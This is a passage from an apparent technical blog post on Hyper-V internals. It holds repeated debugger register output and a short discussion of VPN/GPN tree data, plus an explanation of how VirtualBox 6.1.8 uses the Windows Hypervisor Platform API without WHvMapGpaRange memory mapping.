<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd010 r8=0000000000080400 r9=0000000000000ff0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd010 r8=0000000000080400 r9=0000000000000ff0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see the VPN and GPN tree data:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="205" src="https://lh4.googleusercontent.com/JG_llaqMvrrCqckwdsfeW8xx-KOJqzgVjYA_8csXnlNlnU7OCXOs9P__ZPsAK1fJ5__Xrwc4jtNM6ExxlyNsvLuibS2VlLkxstQ8m329aOpOOIuH0OE564TRazp2aJ5A3ogUJhvSVRJf8jrc0A" style="margin-left: 0px; margin-top: 0px;" width="499" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="218" src="https://lh6.googleusercontent.com/blHGkcBkRHKT54xDwd4OPBvUCj9sgPedYkrFEizcoENos4drGeFjdDpz8m0kbgu4r-BEhc2Ag1o2GXGZorV5fCQeypbshwlAm9HLtIYJIOE0Uqwkqbm8_TvZsWz3GrNxBvHHOFqfIqdUQ2j2xw" style="margin-left: 0px; margin-top: 0px;" width="506" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="200" src="https://lh5.googleusercontent.com/QuwP9yXdhs3UJPPH1qFqg6BLu4Zhw9mxlIAqMUCVNQXvBSIZhAHS49ybVeKgX-865BZlxZQDzkeKaYc4LFgewmcprg8Cbz7d7EYMfR_XlEJRyeZms_ryZPHjvuFmm34DBFW5bgtBNEN2mzzGpA" style="margin-left: 0px; margin-top: 0px;" width="510" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The sizes of the blocks in the guest OS are approximately the same (bfedd and bff40), but technically they are not equivalent.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For VirtualBox 6.1.8 we get:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="199" src="https://lh3.googleusercontent.com/cvoJOXpNsRxENKrwggKB4Md6rETiFwZfFQKRV2HWjHh87WS80P9zz7u3kpjL3HYQ2rOMpdM2AuvGSn0Q_JHXnagN_v7kW8IjIXax0jATbivTJT56lFajS7WNOtZcvERc8TMXgaIx9-V2xXFRig" style="margin-left: 0px; margin-top: 0px;" width="231" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Although the VirtualBox developers use winhvplatform!WHvCreatePartition, they do not perform memory mapping using winhvplatform!WHvMapGpaRange and winhvr!WinHvMapGpaPagesSpecial. VirtualBox emulation operations are partially performed in kernel mode, and user-mode performance is insufficient for the virtualization subsystem to function normally. The development topic about compatibility between Hyper-V and VirtualBox can be seen on the official VirtualBox forum:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://forums.virtualbox.org/viewtopic.php?f=6&t=90853" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://forums.virtualbox.org/viewtopic.php?f=6&t=90853</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The main subsystem working with Hyper-V is described in this file:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<a href="https://www.virtualbox.org/browser/vbox/trunk/src/VBox/VMM/VMMR3/NEMR3Native-win.cpp" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.virtualbox.org/browser/vbox/trunk/src/VBox/VMM/VMMR3/NEMR3Native-win.cpp</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
